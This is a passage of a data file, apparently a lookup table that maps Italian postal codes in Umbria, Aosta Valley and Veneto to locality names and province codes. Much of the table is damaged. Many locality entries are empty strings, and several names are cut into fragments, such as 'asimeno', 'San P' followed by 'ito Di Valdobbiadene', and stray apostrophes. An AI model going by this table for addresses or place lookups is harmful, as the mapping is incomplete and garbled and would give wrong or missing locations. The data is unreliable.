["", "PG"], ["Scheggino", "PG"], ["Poggiodomo", "PG"], ["", "PG"], ], "06041": [["", "PG"], ["Triponzo", "PG"], ["", "PG"], ["Bugiano", "PG"]], "06042": [["", "PG"]], "06043": [["Cascia", "PG"], ["Chiavano", "PG"], ["", "PG"]], "06044": [["", "PG"], ["Bruna", "PG"]], "06045": [["", "PG"]], "06046": [ ["Ancarano", "PG"], ["Agriano", "PG"], ["", "PG"], ["", "PG"], ["Norcia", "PG"], ["Serravalle", "PG"], ["Castelluccio", "PG"], ["", "PG"], ], "06047": [ ["Abeto", "PG"], ["Belforte", "PG"], ["Todiano", "PG"], ["", "PG"], ["Preci", "PG"], ["Piedivalle", "PG"], ["Roccanolfi", "PG"], ], "06049": [ ["Montemartano", "PG"], ["", "PG"], ["", "PG"], ["Cortaccione", "PG"], ["", "PG"], ["Maiano", "PG"], ["Eggi", "PG"], ["Morgnano", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["Beroide", "PG"], ["Spoleto", "PG"], ["", "PG"], ["", "PG"], ["Strettura", "PG"], ], "06050": [["Collazzone", "PG"], ["Collepepe", "PG"], ["Piedicolle", "PG"], ["Casalalta", "PG"]], "06051": [["Ripabianca", "PG"], ["Casalina", "PG"]], "06053": [ ["", "PG"], ["' Di Celle", 
"PG"], ["Deruta", "PG"], ["", "PG"], ["", "PG"], ], "06054": [["", "PG"]], "06055": [ ["Papiano", "PG"], ["", "PG"], ["Marsciano", "PG"], ["", "PG"], ], "06056": [["Colpetrazzo", "PG"], ["", "PG"], ["Viepri", "PG"], ["", "PG"]], "06057": [["", "PG"]], "06059": [ ["Todi", "PG"], ["Camerata", "PG"], ["", "PG"], ["Pantalla", "PG"], ["Montenero", "PG"], ["Canonica", "PG"], ["Collevalenza", "PG"], ["Izzalini", "PG"], ["Ponterio", "PG"], ["Ilci", "PG"], ["Pontecuti", "PG"], ["", "PG"], ["Monticello", "PG"], ], "06060": [["", "PG"], ["", "PG"], ["Paciano", "PG"]], "06061": [ ["Pozzuolo", "PG"], ["Villastrada", "PG"], ["Macchie", "PG"], ["", "PG"], ["Gioiella", "PG"], ["Panicarola", "PG"], ["", "PG"], ["Sanfatucchio", "PG"], ["Porto", "PG"], ], "06062": [ ["", "PG"], ["Salci", "PG"], ["", "PG"], ["Ponticelli", "PG"], ["' D", "PG"], ["Moiano", "PG"], ], "06063": [ ["Soccorso", "PG"], ["Agello", "PG"], ["Villa", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["Magione", "PG"], ["Sant'Arcangelo", "PG"], ], "06064": [["Panicale", "PG"]], "06065": [["", "PG"], ["", "PG"]], "06066": [["Pietrafitta", "PG"], ["Piegaro", "PG"], ["", "PG"]], "06068": [["Tavernelle", "PG"]], "06069": [["asimeno", "PG"], ["", "PG"], ["", "PG"]], "06070": [["Ellera", "PG"], ["", "PG"], ["", "PG"]], "06072": [ ["Mercatello", "PG"], ["", "PG"], ["Migliano", "PG"], ["", "PG"], ["Compignano", "PG"], ["", "PG"], ["Spina", "PG"], ["Badiola", "PG"], ], "06073": [["Corciano", "PG"], ["Mantignana", "PG"]], "06081": [ ["Rivotorto", "PG"], ["Assisi", "PG"], ["Castelnuovo", "PG"], ["Tordandrea", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["", "PG"], ["San Vitale", "PG"], ["Petrignano", "PG"], ["Palazzo", "PG"], ["Torchiagina", "PG"], ], "06083": [ ["Costano", "PG"], ["", "PG"], ["Ospedalicchio", "PG"], ["Bastia", "PG"], ], "06084": [["Bettona", "PG"], ["", "PG"], ["Passaggio", "PG"]], "06089": [["Torgiano", "PG"], ["", "PG"], ["Brufa", "PG"], ["Fornaci", "PG"]], "06100": [["Perugia", "PG"]], "06121": [["Perugia", "PG"]], "06122": [["Perugia", "PG"]], "06123": [["Perugia", "PG"]], "06124": [["Perugia", "PG"], ["", "PG"]], "06125": [["Perugia", "PG"]], "06126": [["Perugia", "PG"], ["Montecorneo", "PG"], ["Montebello", "PG"]], "06127": [["", "PG"], ["Perugia", "PG"]], "06128": [["Perugia", "PG"], ["", "PG"]], "06129": [["Prepo", "PG"], ["Perugia", "PG"]], "06131": [["Perugia", "PG"], ["", "PG"]], "06132": [["", "PG"], ["Perugia", "PG"]], "06134": [["Perugia", "PG"]], "05010": [ ["", "TR"], ["Porano", "TR"], ["Montegabbione", "TR"], ["Parrano", "TR"], ["Ospedaletto", "TR"], ["", "TR"], ["Pornello", "TR"], ["San Vito In Monte", "TR"], ["Collelungo", "TR"], ["Ripalvella", "TR"], ], "05011": [["Allerona Stazione", "TR"], ["Stazione Di Allerona", "TR"], ["Allerona", "TR"]], "05012": [["Attigliano", "TR"]], "05013": [["", "TR"]], "05014": [["", "TR"], ["Monterubiaglio", "TR"], ["Pianlungo", "TR"]], "05015": [["", "TR"], ["Fabro", "TR"], ["Carnaiola", "TR"]], "05016": [["Sala", "TR"], ["Ficulle", "TR"]], "05017": [["", "TR"], ["Monteleone D'Orvieto", "TR"]], "05018": [ ["Sugano", "TR"], ["Ciconia", "TR"], ["Corbara", "TR"], ["Orvieto", "TR"], ["Prodo", "TR"], ["", "TR"], ["", "TR"], ["Orvieto Stazione", "TR"], ["Canale Nuovo", "TR"], ["Sferracavallo", "TR"], ["Titignano", "TR"], ["Canale", "TR"], ["", "TR"], ["Gabelletta", "TR"], ["Morrano", "TR"], ["Orvieto Scalo", "TR"], ], "05020": [ ["Santa Restituta", "TR"], ["Melezzole", "TR"], ["", "TR"], ["Dunarobba", "TR"], ["Montecchio", "TR"], ["Tenaglie", "TR"], ["Sismano", "TR"], 
["", "TR"], ["Alviano", "TR"], ], "05021": [["Casigliano", "TR"], ["Acquasparta", "TR"], ["Portaria", "TR"]], "05022": [ ["", "TR"], ["Montecampano", "TR"], ["Porchiano", "TR"], ["Amelia", "TR"], ["Macchie", "TR"], ["Fornole", "TR"], ], "05023": [["", "TR"], ["Acqualoreto", "TR"], ["Baschi", "TR"], ["Morre", "TR"]], "05024": [["Giove", "TR"]], "05025": [["Guardea", "TR"]], "05026": [ ["Collesecco", "TR"], ["Montecastrilli", "TR"], ["", "TR"], ["Quadrelli", "TR"], ["Casteltodino", "TR"], ["Farnetta", "TR"], ], "05028": [["", "TR"]], "05029": [["", "TR"]], "05030": [ ["Polino", "TR"], ["", "TR"], ["Fontechiaruccia", "TR"], ["Montefranco", "TR"], ["Otricoli", "TR"], ], "05031": [["Casteldilago", "TR"], ["Arrone", "TR"], ["Buonacquisto", "TR"]], "05032": [["", "TR"], ["", "TR"]], "05034": [["Ferentillo", "TR"]], "05035": [ ["Taizzano", "TR"], ["Narni", "TR"], ["Vigne", "TR"], ["Schifanoia", "TR"], ["", "TR"], ["Montoro", "TR"], ["Itieli", "TR"], ["", "TR"], ["", "TR"], ["", "TR"], ["Gualdo", "TR"], ["San Vito", "TR"], ["", "TR"], ["", "TR"], ["Capitone", "TR"], ["", "TR"], ["", "TR"], ["Stifone", "TR"], ["Testaccio", "TR"], ["Borgaria", "TR"], ["Sant'Urbano", "TR"], ], "05039": [["Stroncone", "TR"]], "05100": [ ["Collestatte", "TR"], ["Marmore", "TR"], ["", "TR"], ["Miranda", "TR"], ["Terni", "TR"], ["Cesi", "TR"], ["", "TR"], ["", "TR"], ["Collescipoli", "TR"], ["Valenza", "TR"], ["Cecalocco", "TR"], ["Giuncano", "TR"], ["", "TR"], ["Battiferro", "TR"], ["Papigno", "TR"], ["Piediluco", "TR"], ["", "TR"], ["Torreorsina", "TR"], ], "11010": [ ["Doues", "AO"], ["Vieyes", "AO"], ["", "AO"], ["Valgrisenche", "AO"], ["", "AO"], ["Allein", "AO"], ["Valpelline", "AO"], ["Ollomont", "AO"], ["Pre' ", "AO"], ["Runaz", "AO"], ["Montan", "AO"], ["", "AO"], ["", "AO"], ["Bionaz", "AO"], ["Bosses", "AO"], ["Verrand", "AO"], ["", "AO"], ["Oyace", "AO"], ["", "AO"], ["Sarre", "AO"], ["", "AO"], ["Aymavilles", "AO"], ["", "AO"], ["", "AO"], ["Roisan", "AO"], ["Angelin", "AO"], ["Arensod", "AO"], ["Introd", "AO"], ["Chesallet", "AO"], ["Valsavarenche", "AO"], ["Gignod", "AO"], ["Avise", "AO"], ], "11011": [["Leverogne", "AO"], ["Planaval", "AO"], ["Arvier", "AO"]], "11012": [["Cogne", "AO"], ["Gimillian", "AO"], ["Epinel", "AO"]], "11013": [["Dolonne", "AO"], ["Courmayeur", "AO"], ["Entreves", "AO"], ["", "AO"]], "11014": [["Etroubles", "AO"], ["", "AO"]], "11015": [["", "AO"], ["Derby", "AO"]], "11016": [["", "AO"]], "11017": [["Morgex", "AO"]], "11018": [["Villeneuve", "AO"]], "11020": [ ["La Place", "AO"], ["", "AO"], ["'", "AO"], ["Gaby", "AO"], ["'", "AO"], ["Pontboset", "AO"], ["", "AO"], ["Ville", "AO"], ["Peroulaz", "AO"], ["", "AO"], ["Grand ", "AO"], ["Etabloz", "AO"], ["", "AO"], ["", "AO"], ["Perloz", "AO"], ["", "AO"], ["Fontainemore", "AO"], ["Verrayes", "AO"], ["Nus", "AO"], ["", "AO"], ["", "AO"], ["", "AO"], ["", "AO"], ["Barme", "AO"], ["Periasc", "AO"], ["Issogne", "AO"], ["Brissogne", "AO"], ["Charvensod", "AO"], ["Mongnod", "AO"], ["", "AO"], ["Jovencan", "AO"], ["Champoluc", "AO"], ["Champdepraz", "AO"], ["Villefranche", "AO"], ["Quart", "AO"], ["Villair", "AO"], ["Antagnod", "AO"], ["Buisson", "AO"], ["Hone", "AO"], ["Champorcher", "AO"], ["Pollein", "AO"], ["Blavy", "AO"], ["Bard", "AO"], ["Vert", "AO"], ["Montjovet", "AO"], ["Lignod", "AO"], ["Issime", "AO"], ["Torgnon", "AO"], ["Fiernaz", "AO"], ["", "AO"], ["Fenis", "AO"], ["Neyran", "AO"], ["Ayas", "AO"], ["Grand Vert", "AO"], ["Gressan", "AO"], ["Donnas", "AO"], ["Lillianes", "AO"], ["Chamois", "AO"], ["Emarese", "AO"], ["Arnad", 
"AO"], ["", "AO"], ], "11021": [["Breuil", "AO"], ["", "AO"], ["Cervinia", "AO"]], "11022": [["Arcesaz", "AO"], ["Brusson", "AO"], ["Extrepieraz", "AO"]], "11023": [["", "AO"], ["Chambave", "AO"]], "11024": [["Chatillon", "AO"], ["Ussel", "AO"], ["Pontey", "AO"], ["Lassolaz", "AO"]], "11025": [["", "AO"]], "11026": [["", "AO"]], "11027": [["Moron", "AO"], ["", "AO"]], "11028": [["Valtournenche", "AO"], ["Paquier", "AO"]], "11029": [["Verres", "AO"], ["Glair", "AO"]], "11100": [ ["Signayes", "AO"], ["Porossan", "AO"], ["Roisan", "AO"], ["Excenex", "AO"], ["Arpuilles", "AO"], ["Aosta", "AO"], ], "32010": [ ["Garna", "BL"], ["Mareson", "BL"], ["", "BL"], ["", "BL"], ["Tignes", "BL"], ["Lamosano", "BL"], ["Tambre", "BL"], ["Pecol", "BL"], ["Podenzoi", "BL"], ["Codissago", "BL"], ["Termine", "BL"], ["Soverzene", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ], "32012": [["", "BL"], ["Dont", "BL"], ["", "BL"], ["", "BL"]], "32013": [["Igne", "BL"], ["Longarone", "BL"], ["Fortogna", "BL"]], "32014": [ ["", "BL"], ["Polpet", "BL"], ["", "BL"], ["Paiane", "BL"], ["", "BL"], ["Cadola", "BL"], ["Casan", "BL"], ["Soccher", "BL"], ], "32015": [["", "BL"], ["Cornei", "BL"]], "32016": [["", "BL"], ["", "BL"], ["Spert", "BL"], ["", "BL"]], "32020": [ ["Tiser", "BL"], ["Villapiana", "BL"], ["", "BL"], ["Gosaldo", "BL"], ["Limana", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["Falcade", "BL"], ["Arabba", "BL"], ["Avoscan", "BL"], ["", "BL"], ["Dussoi", "BL"], ["Caviola", "BL"], ["Ronchena", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["Frassene'", "BL"], ["", "BL"], ], "32021": [["Agordo", "BL"]], "32022": [["Caprile", "BL"], ["Alleghe", "BL"]], "32023": [["", "BL"], ["", "BL"], ["", "BL"]], "32026": [["Trichiana", "BL"], ["Lentiai", "BL"], ["", "BL"], ["Mel", "BL"]], "32027": [["", "BL"]], "32028": [["", "BL"]], "32030": [ ["", "BL"], ["Busche", "BL"], ["Rocca", "BL"], ["'", "BL"], ["Fastro", "BL"], ["Arten", "BL"], ["Cesiomaggiore", "BL"], ["", "BL"], ["Mellame", "BL"], ["Sovramonte", "BL"], ["Arsie'", "BL"], ["Fonzaso", "BL"], ["Paderno", "BL"], ["Soranzen", "BL"], ["Sorriva", "BL"], ], "32031": [["Colmirano", "BL"], ["Fener", "BL"], ["", "BL"]], "32032": [ ["Villabruna", "BL"], ["Mugnai", "BL"], ["Anzu'", "BL"], ["Umin", "BL"], ["Tomo", "BL"], ["Feltre", "BL"], ["Foen", "BL"], ["Villapaiera", "BL"], ], "32033": [["Lamon", "BL"], ["Arina", "BL"]], "32034": [["Pedavena", "BL"], ["Facen", "BL"], ["Norcen", "BL"], ["Travagola", "BL"]], "32035": [["Meano", "BL"], ["Formegan", "BL"], ["", "BL"]], "32036": [["Mas", "BL"], ["Bribano", "BL"], ["", "BL"], ["Sedico", "BL"]], "32037": [["Sospirolo", "BL"], ["Mis", "BL"]], "32038": [["Vas", "BL"], ["Quero Vas", "BL"], ["Quero", "BL"]], "32040": [ ["Dosoledo", "BL"], ["Candide", "BL"], ["", "BL"], ["Venas", "BL"], ["", "BL"], ["", "BL"], ["Vallesella", "BL"], ["Casamazzagno", "BL"], ["", "BL"], ["", "BL"], ["Presenaio", "BL"], ["", "BL"], ["", "BL"], ["Padola", "BL"], ["Costalta", "BL"], ["", "BL"], ["", "BL"], ["Pelos", "BL"], ["Villapiccola", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["", "BL"], ["Masarie'", "BL"], ["", "BL"], ["", "BL"], ], "32041": [["Giralba", "BL"], ["Misurina", "BL"], ["Reane", "BL"], ["", "BL"]], "32042": [["", "BL"]], "32043": [["Acquabona", "BL"], ["Zuel", "BL"], ["Verocai", "BL"], ["", "BL"]], "32044": [["Pozzale", "BL"], ["", "BL"], ["Sottocastello", "BL"], ["", "BL"]], "32045": [["", "BL"], ["", "BL"], ["Costalissoio", "BL"]], "32046": [["Chiapuzza", "BL"], ["San Vito Di Cadore", 
"BL"]], "32047": [["Granvilla", "BL"], ["Sappada", "BL"]], "32100": [ ["Salce", "BL"], ["Sossai", "BL"], ["Levego", "BL"], ["Tisoi", "BL"], ["Caleipo", "BL"], ["", "BL"], ["Belluno", "BL"], ["Visome", "BL"], ["Antole", "BL"], ["Fiammoi", "BL"], ["Sois", "BL"], ["Bes", "BL"], ["Safforze", "BL"], ["Castion", "BL"], ], "35010": [ ["", "PD"], ["", "PD"], ["Grantorto", "PD"], ["Curtarolo", "PD"], ["", "PD"], ["Cadoneghe", "PD"], ["Loreggiola", "PD"], ["Borgoricco", "PD"], ["", "PD"], ["San Pietro In Gu", "PD"], ["Cavino", "PD"], ["", "PD"], ["Perarolo", "PD"], ["San Giorgio In Bosco", "PD"], ["Villanova", "PD"], ["Limena", "PD"], ["", "PD"], ["Vigodarzere", "PD"], ["Ponterotto", "PD"], ["Arsego", "PD"], ["", "PD"], ["", "PD"], ["", "PD"], ["Campodoro", "PD"], ["Codiverno", "PD"], ["Tavo", "PD"], ["Taggi'", "PD"], ["Camazzole", "PD"], ["Terraglione", "PD"], ["Pieve", "PD"], ["Mejaniga", "PD"], ["Loreggia", "PD"], ["Silvelle", "PD"], ["Massanzago", "PD"], ["Pionca", "PD"], ["", "PD"], ["Fratte", "PD"], ["", "PD"], ["", "PD"], ["Sant'Ambrogio", "PD"], ["", "PD"], ["Fossalta", "PD"], ["", "PD"], ["Vigonza", "PD"], ["Marsango", "PD"], ["", "PD"], ["", "PD"], ["Trebaseleghe", "PD"], ["Gazzo", "PD"], ], "35011": [["", "PD"], ["Campodarsego", "PD"]], "35012": [["Rustega", "PD"], ["Camposampiero", "PD"]], "35013": [["Santa ", "PD"], ["Laghi", "PD"], ["Cittadella", "PD"]], "35014": [["Fontaniva", "PD"]], "35015": [["", "PD"]], "35016": [["Presina", "PD"], ["Vaccarino", "PD"], ["", "PD"], ["Tremignon", "PD"]], "35017": [["", "PD"], ["Torreselle", "PD"], ["Levada", "PD"], ["Ronchi", "PD"]], "35018": [["", "PD"]], "35019": [["Onara", "PD"], ["Tombolo", "PD"]], "35020": [ ["Legnaro", "PD"], ["", "PD"], ["Tribano", "PD"], ["Arzercavalli", "PD"], ["", "PD"], ["Brugine", "PD"], ["Polverara", "PD"], ["Codevigo", "PD"], ["Terradura", "PD"], ["Casone", "PD"], ["", "PD"], ["Cive'", "PD"], ["Correzzola", "PD"], ["Candiana", "PD"], ["Pozzonovo", "PD"], ["Albignasego", "PD"], ["Casalserugo", "PD"], ["Campagnola", "PD"], ["Arzergrande", "PD"], ["Conche", "PD"], ["Vallonga", "PD"], ["Vigorovea", "PD"], ["Saonara", "PD"], ["", "PD"], ["", "PD"], ["'", "PD"], ["", "PD"], ["Pernumia", "PD"], ["Arre", "PD"], ["", "PD"], ["Roncaglia", "PD"], ["Bertipaglia", "PD"], ["Sant'Agostino", "PD"], ["", "PD"], ["Mandriola", "PD"], ["Villatora", "PD"], ], "35021": [["Agna", "PD"]], "35022": [["", "PD"], ["Borgoforte", "PD"]], "35023": [["", "PD"], ["", "PD"], ["", "PD"]], "35024": [["Bovolenta", "PD"]], "35025": [["Cagnola", "PD"], ["Cartura", "PD"]], "35026": [["Conselve", "PD"]], "35027": [["", "PD"], ["", "PD"]], "35028": [["Arzerello", "PD"], ["", "PD"], ["Piovega", "PD"], ["Corte", "PD"]], "35029": [["Pontelongo", "PD"]], "35030": [ ["", "PD"], ["Baone", "PD"], ["Rivadolmo", "PD"], ["", "PD"], ["Bosco", "PD"], ["Veggiano", "PD"], ["Tencarola", "PD"], ["", "PD"], ["Valsanzibio", "PD"], ["Vo' Vecchio", "PD"], ["Villaguattera", "PD"], ["Sarmeola", "PD"], ["Feriole", "PD"], ["Saccolongo", "PD"], ["", "PD"], ["Rubano", "PD"], ["Caselle", "PD"], ["Fossona", "PD"], ["Galzignano", "PD"], ["Vo'", "PD"], ["Rovolon", "PD"], ["Bastia", "PD"], ["", "PD"], ["", "PD"], ["Montemerlo", "PD"], ], "35031": [["", "PD"], ["Monteortone", "PD"]], "35032": [["", "PD"]], "35034": [["Lanzetta", "PD"], ["", "PD"]], "35035": [["Mestrino", "PD"], ["Arlesega", "PD"]], "35036": [["", "PD"]], "35037": [ ["Teolo", "PD"], ["Treponti", "PD"], ["", "PD"], ["Villa", "PD"], ["", "PD"], ["Bresseo", "PD"], ], "35038": [["Torreglia", "PD"]], "35040": [ ["Barbona", "PD"], 
["", "PD"], ["Vescovana", "PD"], ["Sant'Elena", "PD"], ["", "PD"], ["", "PD"], ["", "PD"], ["Masi", "PD"], ["", "PD"], ["Merlara", "PD"], ["", "PD"], ["", "PD"], ["Bresega", "PD"], ["", "PD"], ["Carmignano", "PD"], ["Urbana", "PD"], ["Colombare", "PD"], ["Ponso", "PD"], ["", "PD"], ["Granze", "PD"], ["", "PD"], ["Megliadino San Vitale", "PD"], ["Carceri", "PD"], ["", "PD"], ["Sant'Urbano", "PD"], ["Castelbaldo", "PD"], ], "35041": [["", "PD"]], "35042": [["Deserto", "PD"], ["Este", "PD"], ["Pilastro", "PD"]], "35043": [["", "PD"], ["Monselice", "PD"], ["", "PD"]], "35044": [["Montagnana", "PD"]], "35045": [["Ospedaletuganeo", "PD"]], "35046": [["Saletto", "PD"]], "35047": [["Solesino", "PD"]], "35048": [["Stanghella", "PD"], ["Pisana", "PD"], ["", "PD"]], "35100": [["Padova", "PD"]], "35121": [["Padova", "PD"]], "35122": [["Padova", "PD"]], "35123": [["Padova", "PD"]], "35124": [["Padova", "PD"], ["Salboro", "PD"]], "35125": [["Guizza", "PD"], ["Padova", "PD"]], "35126": [["Padova", "PD"]], "35127": [["Padova", "PD"], ["Camin", "PD"], ["Terranegra", "PD"]], "35128": [["Padova", "PD"]], "35129": [["Padova", "PD"], ["Mortise", "PD"], ["", "PD"]], "35131": [["Padova", "PD"]], "35132": [["Padova", "PD"]], "35133": [["Padova", "PD"]], "35134": [["Padova", "PD"]], "35135": [["Padova", "PD"]], "35136": [["Padova", "PD"]], "35137": [["Padova", "PD"]], "35138": [["Padova", "PD"], ["Monta'", "PD"]], "35139": [["Padova", "PD"]], "35141": [["Padova", "PD"]], "35142": [["Padova", "PD"], ["Mandria", "PD"]], "35143": [["Brusegana", "PD"], ["Padova", "PD"]], "45010": [ ["Rosolina", "RO"], ["", "RO"], ["Villadose", "RO"], ["Ceregnano", "RO"], ["", "RO"], ["Braglia", "RO"], ["", "RO"], ["", "RO"], ["Gavello", "RO"], ["Canale", "RO"], ["Papozze", "RO"], ], "45011": [ ["Piantamelon", "RO"], ["Baricetta", "RO"], ["Adria", "RO"], ["Valliera", "RO"], ["Cavedon", "RO"], ["", "RO"], ["Bottrighe", "RO"], ["", "RO"], ["Bellombra", "RO"], ["Fasana", "RO"], ["", "RO"], ["Passetto", "RO"], ], "45012": [ ["Piano", "RO"], [" In Punta", "RO"], ["Grillara", "RO"], ["Riva'", "RO"], ["Ariano", "RO"], ["", "RO"], ["", "RO"], ["Crociara", "RO"], ], "45014": [["", "RO"], ["Contarina", "RO"], ["Donada", "RO"], ["Villaregia", "RO"]], "45015": [["Corbola", "RO"]], "45017": [["Loreo", "RO"]], "45018": [ ["Scardovari", "RO"], ["", "RO"], ["Bonelli", "RO"], ["", "RO"], ["", "RO"], ["Tolle", "RO"], ["Gnocca", "RO"], ["", "RO"], ["Donzella", "RO"], ["Boccasette", "RO"], ["Ivica", "RO"], ["", "RO"], ], "45019": [ ["Mazzorno", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["Polesinello", "RO"], ], "45020": [ ["Lusia", "RO"], ["", "RO"], ["Castelguglielmo", "RO"], ["Cavazzana", "RO"], ["Pincara", "RO"], ["Zelo", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["Canda", "RO"], ["Baruchella", "RO"], ], "45021": [["Salvaterra", "RO"], ["", "RO"], ["", "RO"], ["Colombano", "RO"]], "45022": [["", "RO"]], "45023": [["", "RO"]], "45024": [["", "RO"]], "45025": [["", "RO"]], "45026": [ ["Barbuglio", "RO"], ["", "RO"], ["Saguedo", "RO"], ["Ramodipalo", "RO"], ["Lendinara", "RO"], ], "45027": [["Sariano", "RO"], ["Pissatola", "RO"], ["Trecenta", "RO"]], "45030": [ ["", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["Chiesa", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["", "RO"], ["Calto", "RO"], ["", "RO"], ["Occhiobello", "RO"], ["Gaiba", "RO"], ["Beverare", "RO"], ["Crespino", "RO"], ["Salara", "RO"], ["Villamarzana", "RO"], ["Ceneselli", "RO"], ], "45031": [["Corne'", "RO"], ["", "RO"]], "45032": [["Bergantino", "RO"]], "45033": [["Bosaro", "RO"]], 
"45034": [["Canaro", "RO"], ["Paviole", "RO"]], "45035": [["Castelmassa", "RO"]], "45036": [["Ficarolo", "RO"]], "45037": [["", "RO"], ["Melara", "RO"]], "45038": [["Raccano", "RO"], ["Polesella", "RO"]], "45039": [["Sabbioni", "RO"], ["Stienta", "RO"], ["Zampine", "RO"]], "45100": [ ["", "RO"], ["", "RO"], ["Mardimago", "RO"], ["Roverdicre'", "RO"], ["Concadirame", "RO"], ["", "RO"], ["Rovigo", "RO"], ["Sant'Apollinare", "RO"], ["Granzette", "RO"], ["Borsea", "RO"], ["Cantonazzo", "RO"], ["", "RO"], ], "31010": [ ["Fonte", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["Soligo", "TV"], ["Monfumo", "TV"], ["", "TV"], ["One'", "TV"], ["Maser", "TV"], ["Pianzano", "TV"], ["Cimadolmo", "TV"], ["Mosnigo", "TV"], ["", "TV"], ["", "TV"], ["Orsago", "TV"], ["Bibano", "TV"], ["", "TV"], ["Fregona", "TV"], ["Crespignaga", "TV"], ["", "TV"], ["Colfosco", "TV"], ["Osigo", "TV"], ["Priula", "TV"], ["Muliparte", "TV"], ], "31011": [["", "TV"], ["Asolo", "TV"], ["Pagnano", "TV"], ["", "TV"]], "31012": [["", "TV"], ["Anzano", "TV"]], "31013": [["Roverbasso", "TV"], ["Cimetta", "TV"], ["Codogne'", "TV"]], "31014": [["", "TV"], ["", "TV"], ["Colle Umberto", "TV"]], "31015": [["Conegliano", "TV"], ["Scomigo", "TV"], ["Collalbrigo", "TV"]], "31016": [["", "TV"], ["Cordignano", "TV"]], "31017": [["", "TV"], ["", "TV"]], "31018": [["Gaiarine", "TV"], ["Campomolino", "TV"], ["Francenigo", "TV"], ["Albina", "TV"]], "31020": [ ["Villorba", "TV"], ["Zoppe'", "TV"], ["Cosniga", "TV"], ["Liedolo", "TV"], ["Tarzo", "TV"], ["Fossamerlo", "TV"], ["Revine", "TV"], ["", "TV"], ["", "TV"], ["Corbanese", "TV"], ["Bagnolo", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["Vidor", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["Refrontolo", "TV"], ["", "TV"], ["Lancenigo", "TV"], ["", "TV"], ["", "TV"], ["Lago", "TV"], ["", "TV"], ["Rua", "TV"], ], "31021": [ ["Zerman", "TV"], ["Bonisiolo", "TV"], ["Campocroce", "TV"], ["", "TV"], ["Marocco", "TV"], ], "31022": [ ["Sambughe", "TV"], ["Preganziol", "TV"], ["", "TV"], ["Frescada", "TV"], ["", "TV"], ], "31023": [["Castelminio", "TV"], ["", "TV"], ["Resana", "TV"]], "31024": [["Ormelle", "TV"], ["Roncadelle", "TV"]], "31025": [["", "TV"]], "31026": [["Sarmede", "TV"], ["Montaner", "TV"]], "31027": [["Spresiano", "TV"], ["Lovadina", "TV"], ["Visnadello", "TV"]], "31028": [["Vazzola", "TV"], ["Tezze", "TV"], ["Visna'", "TV"]], "31029": [ ["Fadalto", "TV"], ["", "TV"], ["", "TV"], ["Cozzuolo", "TV"], ["Nove", "TV"], ["Carpesica", "TV"], ["", "TV"], ], "31030": [ ["", "TV"], ["Pero", "TV"], ["", "TV"], ["Dosson", "TV"], ["Carbonera", "TV"], ["", "TV"], ["Saletto", "TV"], ["Valla'", "TV"], ["Casier", "TV"], ["", "TV"], ["Sant'Eulalia", "TV"], ["Mignagola", "TV"], ["Arcade", "TV"], ["Vacil", "TV"], ["Tovena", "TV"], ["Semonzo", "TV"], ["Castelcucco", "TV"], ["Altivole", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ], "31031": [["", "TV"]], "31032": [["Lughignano", "TV"], ["", "TV"], ["Conscio", "TV"]], "31033": [ ["Salvatronda", "TV"], ["Salvarosa", "TV"], ["", "TV"], ["Sant'Andrea", "TV"], ["Villarazzo", "TV"], ], "31034": [["", "TV"]], "31035": [["", "TV"], ["Ciano", "TV"], ["", "TV"]], "31036": [["Istrana", "TV"], ["Ospedaletto", "TV"], ["Pezzan", "TV"], ["Sala", "TV"]], "31037": [["", "TV"], ["Loria", "TV"], ["Castione", "TV"], ["Bessica", "TV"]], "31038": [ ["Paese", "TV"], ["Padernello", "TV"], ["Castagnole", "TV"], ["Porcellengo", "TV"], ["Postioma", "TV"], ], "31039": [["", "TV"], ["Poggiana", "TV"], ["Spineda", "TV"]], "31040": [ ["Portobuffole'", "TV"], 
["Pederobba", "TV"], ["", "TV"], ["", "TV"], ["", "TV"], ["Segusino", "TV"], ["", "TV"], ["Bavaria", "TV"], ["Salgareda", "TV"], ["Venegazzu'", "TV"], ["", "TV"], ["Campo Di Pietra Di Salgareda", "TV"], ["Mansue'", "TV"], ["Covolo", "TV"], ["Cessalto", "TV"], ["Onigo", "TV"], ["Falze'", "TV"], ["", "TV"], ["", "TV"], ["Signoressa", "TV"], ["", "TV"], ["", "TV"], ["Trevignano", "TV"], ["", "TV"], ["", "TV"], ["Cusignana", "TV"], ["Chiarano", "TV"], ["Musano", "TV"], ], "31041": [["Cornuda", "TV"]], "31042": [["", "TV"], ["Fagare'", "TV"]], "31043": [["Lutrano", "TV"], ["Fontanelle", "TV"]], "31044": [["Biadene", "TV"], ["Montebelluna", "TV"]], "31045": [["", "TV"]], "31046": [["Fae'", "TV"], ["Oderzo", "TV"], ["Rustigne'", "TV"], ["Piavon", "TV"]], "31047": [["Negrisia", "TV"], ["", "TV"], ["Levada", "TV"]], "31048": [ ["Cavrie", "TV"], ["Spercenigo", "TV"], ["Olmi", "TV"], ["", "TV"], ["", "TV"], ], "31049": [ ["ito Di Valdobbiadene", "TV"], ["Bigolino", "TV"], ["San P", "TV"], ["Valdobbiadene", "TV"], ["Guia", "TV"], ["Pianezze", "TV"], ["", "TV"], ], "31050": [ ["Santandra'", "TV"], ["Morgano", "TV"], ["Combai", "TV"], ["", "TV"], ["Fossalunga", "TV"], ["Carpenedo", "TV"], ["Miane", "TV"], ["", "TV"], ["Vedelago", "TV"], ["Fanzolo", "TV"], ["Albaredo", "TV"], ["Vascon", "TV"], ["Barcon", "TV"], ["Camalo'", "TV"], ["Badoere", "TV"], ["Povegliano", "TV"], ["Casacorba", "TV"], ["Premaor", "TV"], ["", "TV"], ["Cavasagra", "TV"], ["", "TV"], ], "31051": [["Valmareno", "TV"], ["Follina", "TV"], ["Pedeguarda", 